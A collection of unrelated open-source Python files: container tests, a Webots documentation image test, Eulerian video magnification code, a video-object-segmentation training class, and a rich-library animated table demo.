assert o.pop() == 6
assert len(o) == 5
assert o.pop(last=False) == 3
assert len(o) == 4
assert repr(o) == "OrderedSet([5, 2, 4, 1])"
assert o == oset([5, 2, 4, 1])
assert o != oset([5, 4, 2, 1])
assert o == set([5, 2, 4, 1])
assert o == set([5, 4, 2, 1])
o1 = oset([6, 5, 4, 3, 2, 1])
o2 = o1 - o
assert o2 == oset([6, 3])
def exercise_odict():
from libtbx.containers import OrderedDict as odict
d = odict([('banana',3), ('apple',4), ('pear',1)])
d.setdefault('orange', 2)
assert 'orange' in d
assert d['orange'] == 2
assert list(d.keys()) == ['banana', 'apple', 'pear', 'orange']
assert list(d.values()) == [3, 4, 1, 2]
d = odict.fromkeys(('b','c','a'))
assert list(d.keys()) == ['b', 'c', 'a']
def run(args):
assert len(args) == 0
exercise_oset()
exercise_odict()
print("OK")
if (__name__ == "__main__"):
import sys
run(args=sys.argv[1:])
|
docs/tests/test_images.py | victorhu3/webots | 1,561 | 12739691 | """Test module of the images."""
import unittest
from books import Books
import fnmatch
import os
import re
import sys
class TestImages(unittest.TestCase):
"""Unit test of the images."""
def test_images_are_valid(self):
"""Test that the MD files refer to valid URLs."""
books = Books()
for book in books.books:
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as f:
content = f.read()
for match in re.finditer(r"!\[(.*?)\]\((.*?)\)", content):
# remove parameters
is_youtube_video = match.group(1) == "youtube video"
image_ref = match.group(2).split(' ')[0]
if not is_youtube_video and not image_ref.startswith('http'):
image_path = os.path.join(book.path, image_ref)
self.assertTrue(
os.path.isfile(image_path),
msg='%s: "%s" not found' % (md_path, image_path)
)
def test_all_images_are_used(self):
"""Test that all the image files are referenced somewhere."""
books = Books()
for book in books.books:
# search for all images
images_paths = [] # ['image/sonar.png', 'image/sphere.png', ...]
for root, dirnames, filenames in os.walk(book.path):
if 'scenes' in root.replace(books.project_path, ''):
continue
for filename in fnmatch.filter(filenames, '*.png') + fnmatch.filter(filenames, '*.jpg'):
image_path = os.path.join(root, filename)
image_path = image_path[(len(book.path) + 1):]
images_paths.append(image_path.replace('\\', '/'))
self.assertGreater(
len(images_paths), 0,
msg='No image found in book "%s"' % book.name
)
# check the image reference can be found in at least one MD file
for image_path in images_paths:
found = False
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as file:
if (image_path in file.read() or
image_path.replace('.png', '.thumbnail.jpg') in images_paths or
image_path.replace('.png', '.thumbnail.png') in images_paths):
found = True
break
self.assertTrue(
found, msg='Image "%s" not referenced in any MD file.' % image_path
)
# in case of thumbnail make sure the original file is available
if image_path.endswith('.thumbnail.jpg'):
self.assertTrue(
image_path.replace('.thumbnail.jpg', '.png') in images_paths,
msg='Missing original file for thumbnail "%s".' % image_path
)
if __name__ == '__main__':
unittest.main()
|
eulerian_magnification/base.py | MarGetman/EM | 323 | 12739700 | import cv2
import numpy as np
import scipy.fftpack
import scipy.signal
from matplotlib import pyplot
# from eulerian_magnification.io import play_vid_data
from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid
from eulerian_magnification.transforms import temporal_bandpass_filter
def eulerian_magnification(vid_data, fps, freq_min, freq_max, amplification, pyramid_levels=4, skip_levels_at_top=2):
vid_pyramid = create_laplacian_video_pyramid(vid_data, pyramid_levels=pyramid_levels)
for i, vid in enumerate(vid_pyramid):
if i < skip_levels_at_top or i >= len(vid_pyramid) - 1:
# ignore the top and bottom of the pyramid. One end has too much noise and the other end is the
# gaussian representation
continue
bandpassed = temporal_bandpass_filter(vid, fps, freq_min=freq_min, freq_max=freq_max, amplification_factor=amplification)
# play_vid_data(bandpassed)
vid_pyramid[i] += bandpassed
# play_vid_data(vid_pyramid[i])
vid_data = collapse_laplacian_video_pyramid(vid_pyramid)
return vid_data
def show_frequencies(vid_data, fps, bounds=None):
"""Graph the average value of the video as well as the frequency strength"""
averages = []
if bounds:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, bounds[2]:bounds[3], bounds[0]:bounds[1], :].sum())
else:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, :, :, :].sum())
averages = averages - min(averages)
charts_x = 1
charts_y = 2
pyplot.figure(figsize=(20, 10))
pyplot.subplots_adjust(hspace=.7)
pyplot.subplot(charts_y, charts_x, 1)
pyplot.title("Pixel Average")
pyplot.xlabel("Time")
pyplot.ylabel("Brightness")
pyplot.plot(averages)
freqs = scipy.fftpack.fftfreq(len(averages), d=1.0 / fps)
fft = abs(scipy.fftpack.fft(averages))
idx = np.argsort(freqs)
pyplot.subplot(charts_y, charts_x, 2)
pyplot.title("FFT")
pyplot.xlabel("Freq (Hz)")
freqs = freqs[idx]
fft = fft[idx]
freqs = freqs[len(freqs) // 2 + 1:]
fft = fft[len(fft) // 2 + 1:]
pyplot.plot(freqs, abs(fft))
pyplot.show()
def gaussian_video(video, shrink_multiple):
"""Create a gaussian representation of a video"""
vid_data = None
for x in range(0, video.shape[0]):
frame = video[x]
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for i in range(shrink_multiple):
gauss_copy = cv2.pyrDown(gauss_copy)
if x == 0:
vid_data = np.zeros((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))
vid_data[x] = gauss_copy
return vid_data
def laplacian_video(video, shrink_multiple):
vid_data = None
frame_count, height, width, colors = video.shape
for i, frame in enumerate(video):
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for _ in range(shrink_multiple):
prev_copy = gauss_copy[:]
gauss_copy = cv2.pyrDown(gauss_copy)
laplacian = prev_copy - cv2.pyrUp(gauss_copy)
if vid_data is None:
vid_data = np.zeros((frame_count, laplacian.shape[0], laplacian.shape[1], 3))
vid_data[i] = laplacian
return vid_data
def combine_pyramid_and_save(g_video, orig_video, enlarge_multiple, fps, save_filename='media/output.avi'):
"""Combine a gaussian video representation with the original and save to file"""
width, height = get_frame_dimensions(orig_video[0])
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print("Outputting to %s" % save_filename)
writer = cv2.VideoWriter(save_filename, fourcc, fps, (width, height), 1)
for x in range(0, g_video.shape[0]):
img = np.ndarray(shape=g_video[x].shape, dtype='float')
img[:] = g_video[x]
for i in range(enlarge_multiple):
img = cv2.pyrUp(img)
img[:height, :width] = img[:height, :width] + orig_video[x]
res = cv2.convertScaleAbs(img[:height, :width])
writer.write(res)
def get_frame_dimensions(frame):
"""Get the dimensions of a single frame"""
height, width = frame.shape[:2]
return width, height
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = scipy.signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = scipy.signal.lfilter(b, a, data, axis=0)
return y
|
tools/__init__.py | ziransun/wpt | 14,668 | 12739703 | <filename>tools/__init__.py<gh_stars>1000+
from . import localpaths as _localpaths # noqa: F401
|
networks/managers/trainer.py | yoxu515/aot-benchmark | 105 | 12739714 | <filename>networks/managers/trainer.py
import os
import time
import json
import datetime as datetime
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
from torch.utils.data import DataLoader
from torchvision import transforms
from dataloaders.train_datasets import DAVIS2017_Train, YOUTUBEVOS_Train, StaticTrain, TEST
import dataloaders.video_transforms as tr
from utils.meters import AverageMeter
from utils.image import label2colormap, masked_image, save_image
from utils.checkpoint import load_network_and_optimizer, load_network, save_network
from utils.learning import adjust_learning_rate, get_trainable_params
from utils.metric import pytorch_iou
from utils.ema import ExponentialMovingAverage, get_param_buffer_for_ema
from networks.models import build_vos_model
from networks.engines import build_engine
class Trainer(object):
def __init__(self, rank, cfg, enable_amp=True):
self.gpu = rank + cfg.DIST_START_GPU
self.gpu_num = cfg.TRAIN_GPUS
self.rank = rank
self.cfg = cfg
self.print_log("Exp {}:".format(cfg.EXP_NAME))
self.print_log(json.dumps(cfg.__dict__, indent=4, sort_keys=True))
print("Use GPU {} for training VOS.".format(self.gpu))
torch.cuda.set_device(self.gpu)
torch.backends.cudnn.benchmark = True if cfg.DATA_RANDOMCROP[
0] == cfg.DATA_RANDOMCROP[
1] and 'swin' not in cfg.MODEL_ENCODER else False
self.print_log('Build VOS model.')
self.model = build_vos_model(cfg.MODEL_VOS, cfg).cuda(self.gpu)
self.model_encoder = self.model.encoder
self.engine = build_engine(
cfg.MODEL_ENGINE,
'train',
aot_model=self.model,
gpu_id=self.gpu,
long_term_mem_gap=cfg.TRAIN_LONG_TERM_MEM_GAP)
if cfg.MODEL_FREEZE_BACKBONE:
for param in self.model_encoder.parameters():
param.requires_grad = False
if cfg.DIST_ENABLE:
dist.init_process_group(backend=cfg.DIST_BACKEND,
init_method=cfg.DIST_URL,
world_size=cfg.TRAIN_GPUS,
rank=rank,
timeout=datetime.timedelta(seconds=300))
self.model.encoder = nn.SyncBatchNorm.convert_sync_batchnorm(
self.model.encoder).cuda(self.gpu)
self.dist_engine = torch.nn.parallel.DistributedDataParallel(
self.engine,
device_ids=[self.gpu],
output_device=self.gpu,
find_unused_parameters=True,
broadcast_buffers=False)
else:
self.dist_engine = self.engine
self.use_frozen_bn = False
if 'swin' in cfg.MODEL_ENCODER:
self.print_log('Use LN in Encoder!')
elif not cfg.MODEL_FREEZE_BN:
if cfg.DIST_ENABLE:
self.print_log('Use Sync BN in Encoder!')
else:
self.print_log('Use BN in Encoder!')
else:
self.use_frozen_bn = True
self.print_log('Use Frozen BN in Encoder!')
if self.rank == 0:
try:
total_steps = float(cfg.TRAIN_TOTAL_STEPS)
ema_decay = 1. - 1. / (total_steps * cfg.TRAIN_EMA_RATIO)
self.ema_params = get_param_buffer_for_ema(
self.model, update_buffer=(not cfg.MODEL_FREEZE_BN))
self.ema = ExponentialMovingAverage(self.ema_params,
decay=ema_decay)
self.ema_dir = cfg.DIR_EMA_CKPT
except Exception as inst:
self.print_log(inst)
self.print_log('Error: failed to create EMA model!')
self.print_log('Build optimizer.')
trainable_params = get_trainable_params(
model=self.dist_engine,
base_lr=cfg.TRAIN_LR,
use_frozen_bn=self.use_frozen_bn,
weight_decay=cfg.TRAIN_WEIGHT_DECAY,
exclusive_wd_dict=cfg.TRAIN_WEIGHT_DECAY_EXCLUSIVE,
no_wd_keys=cfg.TRAIN_WEIGHT_DECAY_EXEMPTION)
if cfg.TRAIN_OPT == 'sgd':
self.optimizer = optim.SGD(trainable_params,
lr=cfg.TRAIN_LR,
momentum=cfg.TRAIN_SGD_MOMENTUM,
nesterov=True)
else:
self.optimizer = optim.AdamW(trainable_params,
lr=cfg.TRAIN_LR,
weight_decay=cfg.TRAIN_WEIGHT_DECAY)
self.enable_amp = enable_amp
if enable_amp:
self.scaler = torch.cuda.amp.GradScaler()
else:
self.scaler = None
self.prepare_dataset()
self.process_pretrained_model()
if cfg.TRAIN_TBLOG and self.rank == 0:
from tensorboardX import SummaryWriter
self.tblogger = SummaryWriter(cfg.DIR_TB_LOG)
def process_pretrained_model(self):
cfg = self.cfg
self.step = cfg.TRAIN_START_STEP
self.epoch = 0
if cfg.TRAIN_AUTO_RESUME:
ckpts = os.listdir(cfg.DIR_CKPT)
if len(ckpts) > 0:
ckpts = list(
map(lambda x: int(x.split('_')[-1].split('.')[0]), ckpts))
ckpt = np.sort(ckpts)[-1]
cfg.TRAIN_RESUME = True
cfg.TRAIN_RESUME_CKPT = ckpt
cfg.TRAIN_RESUME_STEP = ckpt
else:
cfg.TRAIN_RESUME = False
if cfg.TRAIN_RESUME:
if self.rank == 0:
try:
ema_ckpt_dir = os.path.join(
self.ema_dir,
'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
ema_model, removed_dict = load_network(
self.model, ema_ckpt_dir, self.gpu)
if len(removed_dict) > 0:
self.print_log(
'Remove {} from EMA model.'.format(removed_dict))
ema_decay = self.ema.decay
del (self.ema)
ema_params = get_param_buffer_for_ema(
ema_model, update_buffer=(not cfg.MODEL_FREEZE_BN))
self.ema = ExponentialMovingAverage(ema_params,
decay=ema_decay)
self.ema.num_updates = cfg.TRAIN_RESUME_CKPT
except Exception as inst:
self.print_log(inst)
self.print_log('Error: EMA model not found!')
try:
resume_ckpt = os.path.join(
cfg.DIR_CKPT, 'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
self.model, self.optimizer, removed_dict = load_network_and_optimizer(
self.model,
self.optimizer,
resume_ckpt,
self.gpu,
scaler=self.scaler)
except Exception as inst:
self.print_log(inst)
resume_ckpt = os.path.join(
'saved_models',
'save_step_%s.pth' % (cfg.TRAIN_RESUME_CKPT))
self.model, self.optimizer, removed_dict = load_network_and_optimizer(
self.model,
self.optimizer,
resume_ckpt,
self.gpu,
scaler=self.scaler)
if len(removed_dict) > 0:
self.print_log(
'Remove {} from checkpoint.'.format(removed_dict))
self.step = cfg.TRAIN_RESUME_STEP
if cfg.TRAIN_TOTAL_STEPS <= self.step:
self.print_log("Your training has finished!")
exit()
self.epoch = int(np.ceil(self.step / len(self.train_loader)))
self.print_log('Resume from step {}'.format(self.step))
elif cfg.PRETRAIN:
if cfg.PRETRAIN_FULL:
self.model, removed_dict = load_network(
self.model, cfg.PRETRAIN_MODEL, self.gpu)
if len(removed_dict) > 0:
self.print_log('Remove {} from pretrained model.'.format(
removed_dict))
self.print_log('Load pretrained VOS model from {}.'.format(
cfg.PRETRAIN_MODEL))
else:
model_encoder, removed_dict = load_network(
self.model_encoder, cfg.MODEL_ENCODER_PRETRAIN, self.gpu)
if len(removed_dict) > 0:
self.print_log('Remove {} from pretrained model.'.format(
removed_dict))
self.print_log(
'Load pretrained backbone model from {}.'.format(
cfg.PRETRAIN_MODEL))
def prepare_dataset(self):
cfg = self.cfg
self.enable_prev_frame = cfg.TRAIN_ENABLE_PREV_FRAME
self.print_log('Process dataset...')
composed_transforms = transforms.Compose([
tr.RandomScale(cfg.DATA_MIN_SCALE_FACTOR,
cfg.DATA_MAX_SCALE_FACTOR, cfg.DATA_SHORT_EDGE_LEN),
tr.BalancedRandomCrop(cfg.DATA_RANDOMCROP,
max_obj_num=cfg.MODEL_MAX_OBJ_NUM),
tr.RandomHorizontalFlip(cfg.DATA_RANDOMFLIP),
tr.Resize(cfg.DATA_RANDOMCROP, use_padding=True),
tr.ToTensor()
])
train_datasets = []
if 'static' in cfg.DATASETS:
pretrain_vos_dataset = StaticTrain(
cfg.DIR_STATIC,
cfg.DATA_RANDOMCROP,
seq_len=cfg.DATA_SEQ_LEN,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(pretrain_vos_dataset)
self.enable_prev_frame = False
if 'davis2017' in cfg.DATASETS:
train_davis_dataset = DAVIS2017_Train(
root=cfg.DIR_DAVIS,
full_resolution=cfg.TRAIN_DATASET_FULL_RESOLUTION,
transform=composed_transforms,
repeat_time=cfg.DATA_DAVIS_REPEAT,
seq_len=cfg.DATA_SEQ_LEN,
rand_gap=cfg.DATA_RANDOM_GAP_DAVIS,
rand_reverse=cfg.DATA_RANDOM_REVERSE_SEQ,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
enable_prev_frame=self.enable_prev_frame,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(train_davis_dataset)
if 'youtubevos' in cfg.DATASETS:
train_ytb_dataset = YOUTUBEVOS_Train(
root=cfg.DIR_YTB,
transform=composed_transforms,
seq_len=cfg.DATA_SEQ_LEN,
rand_gap=cfg.DATA_RANDOM_GAP_YTB,
rand_reverse=cfg.DATA_RANDOM_REVERSE_SEQ,
merge_prob=cfg.DATA_DYNAMIC_MERGE_PROB,
enable_prev_frame=self.enable_prev_frame,
max_obj_n=cfg.MODEL_MAX_OBJ_NUM)
train_datasets.append(train_ytb_dataset)
if 'test' in cfg.DATASETS:
test_dataset = TEST(transform=composed_transforms,
seq_len=cfg.DATA_SEQ_LEN)
train_datasets.append(test_dataset)
if len(train_datasets) > 1:
train_dataset = torch.utils.data.ConcatDataset(train_datasets)
elif len(train_datasets) == 1:
train_dataset = train_datasets[0]
else:
self.print_log('No dataset!')
exit(0)
self.train_sampler = torch.utils.data.distributed.DistributedSampler(
train_dataset)
self.train_loader = DataLoader(train_dataset,
batch_size=int(cfg.TRAIN_BATCH_SIZE /
cfg.TRAIN_GPUS),
shuffle=False,
num_workers=cfg.DATA_WORKERS,
pin_memory=True,
sampler=self.train_sampler,
drop_last=True,
prefetch_factor=4)
self.print_log('Done!')
def sequential_training(self):
cfg = self.cfg
if self.enable_prev_frame:
frame_names = ['Ref', 'Prev']
else:
frame_names = ['Ref(Prev)']
for i in range(cfg.DATA_SEQ_LEN - 1):
frame_names.append('Curr{}'.format(i + 1))
seq_len = len(frame_names)
running_losses = []
running_ious = []
for _ in range(seq_len):
running_losses.append(AverageMeter())
running_ious.append(AverageMeter())
batch_time = AverageMeter()
avg_obj = AverageMeter()
optimizer = self.optimizer
model = self.dist_engine
train_sampler = self.train_sampler
train_loader = self.train_loader
step = self.step
epoch = self.epoch
max_itr = cfg.TRAIN_TOTAL_STEPS
start_seq_training_step = int(cfg.TRAIN_SEQ_TRAINING_START_RATIO *
max_itr)
use_prev_prob = cfg.MODEL_USE_PREV_PROB
self.print_log('Start training:')
model.train()
while step < cfg.TRAIN_TOTAL_STEPS:
train_sampler.set_epoch(epoch)
epoch += 1
last_time = time.time()
for frame_idx, sample in enumerate(train_loader):
if step > cfg.TRAIN_TOTAL_STEPS:
break
if step % cfg.TRAIN_TBLOG_STEP == 0 and self.rank == 0 and cfg.TRAIN_TBLOG:
tf_board = True
else:
tf_board = False
if step >= start_seq_training_step:
use_prev_pred = True
freeze_params = cfg.TRAIN_SEQ_TRAINING_FREEZE_PARAMS
else:
use_prev_pred = False
freeze_params = []
if step % cfg.TRAIN_LR_UPDATE_STEP == 0:
now_lr = adjust_learning_rate(
optimizer=optimizer,
base_lr=cfg.TRAIN_LR,
p=cfg.TRAIN_LR_POWER,
itr=step,
max_itr=max_itr,
restart=cfg.TRAIN_LR_RESTART,
warm_up_steps=cfg.TRAIN_LR_WARM_UP_RATIO * max_itr,
is_cosine_decay=cfg.TRAIN_LR_COSINE_DECAY,
min_lr=cfg.TRAIN_LR_MIN,
encoder_lr_ratio=cfg.TRAIN_LR_ENCODER_RATIO,
freeze_params=freeze_params)
ref_imgs = sample['ref_img'] # batch_size * 3 * h * w
prev_imgs = sample['prev_img']
curr_imgs = sample['curr_img']
ref_labels = sample['ref_label'] # batch_size * 1 * h * w
prev_labels = sample['prev_label']
curr_labels = sample['curr_label']
obj_nums = sample['meta']['obj_num']
bs, _, h, w = curr_imgs[0].size()
ref_imgs = ref_imgs.cuda(self.gpu, non_blocking=True)
prev_imgs = prev_imgs.cuda(self.gpu, non_blocking=True)
curr_imgs = [
curr_img.cuda(self.gpu, non_blocking=True)
for curr_img in curr_imgs
]
ref_labels = ref_labels.cuda(self.gpu, non_blocking=True)
prev_labels = prev_labels.cuda(self.gpu, non_blocking=True)
curr_labels = [
curr_label.cuda(self.gpu, non_blocking=True)
for curr_label in curr_labels
]
obj_nums = list(obj_nums)
obj_nums = [int(obj_num) for obj_num in obj_nums]
batch_size = ref_imgs.size(0)
all_frames = torch.cat([ref_imgs, prev_imgs] + curr_imgs,
dim=0)
all_labels = torch.cat([ref_labels, prev_labels] + curr_labels,
dim=0)
self.engine.restart_engine(batch_size, True)
optimizer.zero_grad(set_to_none=True)
if self.enable_amp:
with torch.cuda.amp.autocast(enabled=True):
loss, all_pred, all_loss, boards = model(
all_frames,
all_labels,
batch_size,
use_prev_pred=use_prev_pred,
obj_nums=obj_nums,
step=step,
tf_board=tf_board,
enable_prev_frame=self.enable_prev_frame,
use_prev_prob=use_prev_prob)
loss = torch.mean(loss)
self.scaler.scale(loss).backward()
self.scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(),
cfg.TRAIN_CLIP_GRAD_NORM)
self.scaler.step(optimizer)
self.scaler.update()
else:
loss, all_pred, all_loss, boards = model(
all_frames,
all_labels,
ref_imgs.size(0),
use_prev_pred=use_prev_pred,
obj_nums=obj_nums,
step=step,
tf_board=tf_board,
enable_prev_frame=self.enable_prev_frame,
use_prev_prob=use_prev_prob)
loss = torch.mean(loss)
torch.nn.utils.clip_grad_norm_(model.parameters(),
cfg.TRAIN_CLIP_GRAD_NORM)
loss.backward()
optimizer.step()
for idx in range(seq_len):
now_pred = all_pred[idx].detach()
now_label = all_labels[idx * bs:(idx + 1) * bs].detach()
now_loss = torch.mean(all_loss[idx].detach())
now_iou = pytorch_iou(now_pred.unsqueeze(1), now_label,
obj_nums) * 100
dist.all_reduce(now_loss)
dist.all_reduce(now_iou)
now_loss /= self.gpu_num
now_iou /= self.gpu_num
if self.rank == 0:
running_losses[idx].update(now_loss.item())
running_ious[idx].update(now_iou.item())
if self.rank == 0:
self.ema.update(self.ema_params)
avg_obj.update(sum(obj_nums) / float(len(obj_nums)))
curr_time = time.time()
batch_time.update(curr_time - last_time)
last_time = curr_time
if step % cfg.TRAIN_TBLOG_STEP == 0:
all_f = [ref_imgs, prev_imgs] + curr_imgs
self.process_log(ref_imgs, all_f[-2], all_f[-1],
ref_labels, all_pred[-2], now_label,
now_pred, boards, running_losses,
running_ious, now_lr, step)
if step % cfg.TRAIN_LOG_STEP == 0:
strs = 'I:{}, LR:{:.5f}, T:{:.1f}({:.1f})s, Obj:{:.1f}({:.1f})'.format(
step, now_lr, batch_time.val,
batch_time.moving_avg, avg_obj.val,
avg_obj.moving_avg)
batch_time.reset()
avg_obj.reset()
for idx in range(seq_len):
strs += ', {}: L {:.3f}({:.3f}) IoU {:.1f}({:.1f})%'.format(
frame_names[idx], running_losses[idx].val,
running_losses[idx].moving_avg,
running_ious[idx].val,
running_ious[idx].moving_avg)
running_losses[idx].reset()
running_ious[idx].reset()
self.print_log(strs)
step += 1
if step % cfg.TRAIN_SAVE_STEP == 0 and self.rank == 0:
max_mem = torch.cuda.max_memory_allocated(
device=self.gpu) / (1024.**3)
ETA = str(
datetime.timedelta(
seconds=int(batch_time.moving_avg *
(cfg.TRAIN_TOTAL_STEPS - step))))
self.print_log('ETA: {}, Max Mem: {:.2f}G.'.format(
ETA, max_mem))
self.print_log('Save CKPT (Step {}).'.format(step))
save_network(self.model,
optimizer,
step,
cfg.DIR_CKPT,
cfg.TRAIN_MAX_KEEP_CKPT,
scaler=self.scaler)
try:
torch.cuda.empty_cache()
# First save original parameters before replacing with EMA version
self.ema.store(self.ema_params)
# Copy EMA parameters to model
self.ema.copy_to(self.ema_params)
# Save EMA model
save_network(self.model,
optimizer,
step,
self.ema_dir,
cfg.TRAIN_MAX_KEEP_CKPT,
backup_dir='./saved_ema_models',
scaler=self.scaler)
# Restore original parameters to resume training later
self.ema.restore(self.ema_params)
except Exception as inst:
self.print_log(inst)
self.print_log('Error: failed to save EMA model!')
self.print_log('Stop training!')
def print_log(self, string):
if self.rank == 0:
print(string)
def process_log(self, ref_imgs, prev_imgs, curr_imgs, ref_labels,
prev_labels, curr_labels, curr_pred, boards,
running_losses, running_ious, now_lr, step):
cfg = self.cfg
mean = np.array([[[0.485]], [[0.456]], [[0.406]]])
sigma = np.array([[[0.229]], [[0.224]], [[0.225]]])
show_ref_img, show_prev_img, show_curr_img = [
img.cpu().numpy()[0] * sigma + mean
for img in [ref_imgs, prev_imgs, curr_imgs]
]
show_gt, show_prev_gt, show_ref_gt, show_preds_s = [
label.cpu()[0].squeeze(0).numpy()
for label in [curr_labels, prev_labels, ref_labels, curr_pred]
]
show_gtf, show_prev_gtf, show_ref_gtf, show_preds_sf = [
label2colormap(label).transpose((2, 0, 1))
for label in [show_gt, show_prev_gt, show_ref_gt, show_preds_s]
]
if cfg.TRAIN_IMG_LOG or cfg.TRAIN_TBLOG:
show_ref_img = masked_image(show_ref_img, show_ref_gtf,
show_ref_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_ref_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_ref_img.jpeg' % (step)))
show_prev_img = masked_image(show_prev_img, show_prev_gtf,
show_prev_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_prev_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_prev_img.jpeg' % (step)))
show_img_pred = masked_image(show_curr_img, show_preds_sf,
show_preds_s)
if cfg.TRAIN_IMG_LOG:
save_image(
show_img_pred,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_prediction.jpeg' % (step)))
show_curr_img = masked_image(show_curr_img, show_gtf, show_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_curr_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_groundtruth.jpeg' % (step)))
if cfg.TRAIN_TBLOG:
for seq_step, running_loss, running_iou in zip(
range(len(running_losses)), running_losses,
running_ious):
self.tblogger.add_scalar('S{}/Loss'.format(seq_step),
running_loss.avg, step)
self.tblogger.add_scalar('S{}/IoU'.format(seq_step),
running_iou.avg, step)
self.tblogger.add_scalar('LR', now_lr, step)
self.tblogger.add_image('Ref/Image', show_ref_img, step)
self.tblogger.add_image('Ref/GT', show_ref_gtf, step)
self.tblogger.add_image('Prev/Image', show_prev_img, step)
self.tblogger.add_image('Prev/GT', show_prev_gtf, step)
self.tblogger.add_image('Curr/Image_GT', show_curr_img, step)
self.tblogger.add_image('Curr/Image_Pred', show_img_pred, step)
self.tblogger.add_image('Curr/Mask_GT', show_gtf, step)
self.tblogger.add_image('Curr/Mask_Pred', show_preds_sf, step)
for key in boards['image'].keys():
tmp = boards['image'][key]
for seq_step in range(len(tmp)):
self.tblogger.add_image('S{}/'.format(seq_step) + key, tmp[seq_step].detach().cpu().numpy(), step)
for key in boards['scalar'].keys():
tmp = boards['scalar'][key]
for seq_step in range(len(tmp)):
self.tblogger.add_scalar('S{}/'.format(seq_step) + key, tmp[seq_step].detach().cpu().numpy(), step)
self.tblogger.flush()
del (boards)
|
examples/table_movie.py | gefei/rich | 33,622 | 12739724 | <reponame>gefei/rich
"""Same as the table_movie.py but uses Live to update"""
import time
from contextlib import contextmanager
from rich import box
from rich.align import Align
from rich.console import Console
from rich.live import Live
from rich.table import Table
from rich.text import Text
TABLE_DATA = [
[
"May 25, 1977",
"Star Wars Ep. [b]IV[/]: [i]A New Hope",
"$11,000,000",
"$1,554,475",
"$775,398,007",
],
[
"May 21, 1980",
"Star Wars Ep. [b]V[/]: [i]The Empire Strikes Back",
"$23,000,000",
"$4,910,483",
"$547,969,004",
],
[
"May 25, 1983",
"Star Wars Ep. [b]VI[/b]: [i]Return of the Jedi",
"$32,500,000",
"$23,019,618",
"$475,106,177",
],
[
"May 19, 1999",
"Star Wars Ep. [b]I[/b]: [i]The phantom Menace",
"$115,000,000",
"$64,810,870",
"$1,027,044,677",
],
[
"May 16, 2002",
"Star Wars Ep. [b]II[/b]: [i]Attack of the Clones",
"$115,000,000",
"$80,027,814",
"$656,695,615",
],
[
"May 19, 2005",
"Star Wars Ep. [b]III[/b]: [i]Revenge of the Sith",
"$115,500,000",
"$380,270,577",
"$848,998,877",
],
]
console = Console()
BEAT_TIME = 0.04
@contextmanager
def beat(length: int = 1) -> None:
yield
time.sleep(length * BEAT_TIME)
table = Table(show_footer=False)
table_centered = Align.center(table)
console.clear()
with Live(table_centered, console=console, screen=False, refresh_per_second=20):
with beat(10):
table.add_column("Release Date", no_wrap=True)
with beat(10):
table.add_column("Title", Text.from_markup("[b]Total", justify="right"))
with beat(10):
table.add_column("Budget", "[u]$412,000,000", no_wrap=True)
with beat(10):
table.add_column("Opening Weekend", "[u]$577,703,455", no_wrap=True)
with beat(10):
table.add_column("Box Office", "[u]$4,331,212,357", no_wrap=True)
with beat(10):
table.title = "Star Wars Box Office"
with beat(10):
table.title = (
"[not italic]:popcorn:[/] Star Wars Box Office [not italic]:popcorn:[/]"
)
with beat(10):
table.caption = "Made with Rich"
with beat(10):
table.caption = "Made with [b]Rich[/b]"
with beat(10):
table.caption = "Made with [b magenta not dim]Rich[/]"
for row in TABLE_DATA:
with beat(10):
table.add_row(*row)
with beat(10):
table.show_footer = True
table_width = console.measure(table).maximum
with beat(10):
table.columns[2].justify = "right"
with beat(10):
table.columns[3].justify = "right"
with beat(10):
table.columns[4].justify = "right"
with beat(10):
table.columns[2].header_style = "bold red"
with beat(10):
table.columns[3].header_style = "bold green"
with beat(10):
table.columns[4].header_style = "bold blue"
with beat(10):
table.columns[2].style = "red"
with beat(10):
table.columns[3].style = "green"
with beat(10):
table.columns[4].style = "blue"
with beat(10):
table.columns[0].style = "cyan"
table.columns[0].header_style = "bold cyan"
with beat(10):
table.columns[1].style = "magenta"
table.columns[1].header_style = "bold magenta"
with beat(10):
table.columns[2].footer_style = "bright_red"
with beat(10):
table.columns[3].footer_style = "bright_green"
with beat(10):
table.columns[4].footer_style = "bright_blue"
with beat(10):
table.row_styles = ["none", "dim"]
with beat(10):
table.border_style = "bright_yellow"
for box_style in [
box.SQUARE,
box.MINIMAL,
box.SIMPLE,
box.SIMPLE_HEAD,
]:
with beat(10):
table.box = box_style
with beat(10):
table.pad_edge = False
original_width = console.measure(table).maximum
for width in range(original_width, console.width, 2):
with beat(1):
table.width = width
for width in range(console.width, original_width, -2):
with beat(1):
table.width = width
for width in range(original_width, 90, -2):
with beat(1):
table.width = width
for width in range(90, original_width + 1, 2):
with beat(1):
table.width = width
with beat(2):
table.width = None
|
